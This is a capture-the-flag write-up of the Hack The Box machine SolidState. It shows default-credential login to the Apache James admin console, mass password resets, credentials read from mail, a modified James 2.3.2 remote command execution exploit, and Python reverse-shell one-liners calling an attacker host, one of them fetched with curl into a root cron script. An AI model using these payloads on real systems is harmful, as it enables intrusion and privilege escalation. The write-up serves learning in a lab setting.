Hack The Box - SolidState (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts
.
1
$ echo "10.10.10.51 solidstate.htb" | sudo tee -a /etc/hosts
Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
$ rustscan --accessible -a solidstate.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.51:25
Open 10.10.10.51:22
Open 10.10.10.51:80
Open 10.10.10.51:110
Open 10.10.10.51:119
Open 10.10.10.51:4555
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-14 13:49 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Initiating Connect Scan at 13:49
Scanning solidstate.htb (10.10.10.51) [6 ports]
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
Discovered open port 4555/tcp on 10.10.10.51
Completed Connect Scan at 13:49, 0.01s elapsed (6 total ports)
Initiating Service scan at 13:49
Scanning 6 services on solidstate.htb (10.10.10.51)
Completed Service scan at 13:49, 11.03s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.10.51.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:50, 11.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:50
Completed NSE at 13:50, 0.07s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:50
Completed NSE at 13:50, 0.00s elapsed
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up, received user-set (0.0068s latency).
Scanned at 2021-01-14 13:49:40 UTC for 22s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE=
| 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY
25/tcp open smtp syn-ack JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello solidstate.htb (10.10.XX.XX [10.10.XX.XX]),
80/tcp open http syn-ack Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 syn-ack JAMES pop3d 2.3.2
119/tcp open nntp syn-ack JAMES nntpd (posting ok)
4555/tcp open james-admin syn-ack JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:50
Completed NSE at 13:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:50
Completed NSE at 13:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:50
Completed NSE at 13:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.67 seconds
Enumeration (1)
Port 80 Apache httpd 2.4.25 ((Debian))
It seems that this website belongs to a company called “Solid State Security”. Unfortunately, there is actually nothing of importance here.
Port 4555 JAMES Remote Admin 2.3.2
1
2
3
4
$ nc -v solidstate.htb 4555
solidstate.htb [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
We are instantly prompted for credentials According to online, the default credentials was root:root
. With it, we are able to successfully login!
1
2
3
4
5
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
If we use the listusers
features, we see that there are 5 users on this service.
1
2
3
4
5
6
7
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
As root
on the service, we are able to change the passwords of users.
1
2
3
4
5
6
7
8
9
10
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
Port 110 JAMES pop3d 2.3.2
1
2
3
4
5
$ telnet solidstate.htb 110
Trying 10.10.10.51...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
Using the usernames we found and the passwords we set for them, we can login and check out each of their mails.
Upon logging in as john
, we see that there is a mail talking about sending mindy
her temporary password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
USER john
+OK
PASS password
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
If we login as mindy
, we see 2 mails, one of which containing SSH
credentials!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
USER mindy
+OK
PASS password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2 \
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
Port 22 OpenSSH 7.4p1
Now, we can login using the credentials mindy:P@55W0rd1!2@
.
1
2
3
$ ssh mindy@solidstate.htb
mindy@solidstate:~$ id
-rbash: id: command not found
However, we realise we are in a rbash
shell and we can only cat
, env
and ls
.
user.txt
The user flag is in mindy
’s home directory.
1
2
mindy@solidstate:~$ cat user.txt
0510XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Enumeration (2)
As I was unable to breakout of rbash
with the current commands I have, I decided to look for alternatives. Using searchsploit
, I found exploits relating to the version of James
running on the machine.
1
2
3
4
5
6
7
$ searchsploit james 2.3.2
-------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------- ---------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File W | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
-------------------------------------------------------------------- ---------------------------------
Exploitation (1)
After copying the script for the exploit Apache James Server 2.3.2 - Remote Command Execution
, I modified the payload that is to be executed such that a reverse shell will be executed.
1
2
3
4
$ cat 35513.py
...
payload = 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.XX.XX",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
...
Now, we start our nc
listener
1
2
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
And run the exploit.
1
2
3
4
5
6
$ python 35513.py solidstate.htb
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
Now if we login as mindy
again:
1
$ ssh mindy@solidstate.htb
We will receive a reverse shell connection on our listener as mindy
. However, our shell is no longer restricted!
1
2
3
4
5
6
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.51] 43388
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
Enumeration (2)
Without much enumeration, I found some interesting files in /opt
.
1
2
3
4
5
6
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al /opt
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Jun 18 2017 ..
drwxr-xr-x 11 root root 4096 Aug 22 2017 james-2.3.2
-rwxrwxrwx 1 root root 318 Jan 14 09:26 tmp.py
A file called tmp.py
is owned by root
and we can write to it! Lets check the contents.
1
2
3
4
5
6
7
8
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
It just recursively deletes files in /tmp
. Lets monitor using pspy
to see whether this file is indeed being executed by root
!
After tranferring pspy
over, we can start monitoring for new processes.
1
2
3
4
5
6
7
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32
...
2021/01/14 09:24:01 CMD: UID=0 PID=1743 | /usr/sbin/CRON -f
2021/01/14 09:24:01 CMD: UID=0 PID=1744 | /usr/sbin/CRON -f
2021/01/14 09:24:01 CMD: UID=0 PID=1745 | /bin/sh -c python /opt/tmp.py
2021/01/14 09:24:01 CMD: UID=0 PID=1746 | python /opt/tmp.py
2021/01/14 09:24:01 CMD: UID=0 PID=1747 | sh -c rm -r /tmp/*
We can now confirm that tmp.py
is being executed by root
!
Exploitation (2)
All we have to do is just append a python
reverse shell to tmp.py
1
2
3
4
$ curl http://10.10.XX.XX/payload >> /opt/tmp.py
$ cat /opt/tmp.py
...
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.XX.XX",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
We then setup our nc
listener again and we will eventually receive reverse shell as root
.
1
2
3
4
5
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.51] 55858
root@solidstate:~# id
uid=0(root) gid=0(root) groups=0(root)
root.txt
The root flag is located in the home directory of root
, as usual.
1
2
root@solidstate:~# cat /root/root.txt
4f4aXXXXXXXXXXXXXXXXXXXXXXXXXXXX